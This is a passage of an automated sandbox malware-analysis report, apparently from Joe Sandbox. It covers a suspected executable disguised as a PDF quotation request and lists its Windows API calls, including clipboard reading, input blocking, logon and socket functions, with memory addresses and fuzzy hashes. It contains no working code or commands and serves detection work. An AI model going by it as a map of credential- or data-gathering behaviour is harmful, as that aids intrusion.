                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 3031425849-0
                                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                    APIs
                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                    APIs
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                    • IsIconic.USER32 ref: 0047A393
                                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                    APIs
                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                    • String ID:
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: U$\
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                    Similarity
                                                                    • API ID: Proc
                                                                    • String ID:
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N@
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: afa90e7e472980e876498869805817a143d9d349feb06f7846e97a6dda6f658b
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: EC41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: 358cef88a7ed1250e3ea5542a4536edf8c07012fd331672b5f881233d6e74664
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: 8E019278A10609EFCB48DF98C5909AEF7B5FF48310F248599D919A7311D730AE81DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: cd7ff6470c1df0abad5b99f64709cbd480ec4a2bdf8d4bf29f52562a337fca84
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: 56019278A10209EFCB44DF98C5909AEF7B5FF8C310F248599D919A7351D730AE91DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    APIs
                                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                    • _wcslen.LIBCMT ref: 00459916
                                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 4040870279-2373415609
                                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                    • String ID:
                                                                    • API String ID: 69173610-0
                                                                    • Opcode ID: 9cbb2e0e6e9bc8cc5086cec67c9521896feea0bdb3ddff116a010ae3a32032cf
                                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                    • Opcode Fuzzy Hash: 9cbb2e0e6e9bc8cc5086cec67c9521896feea0bdb3ddff116a010ae3a32032cf
                                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                    APIs
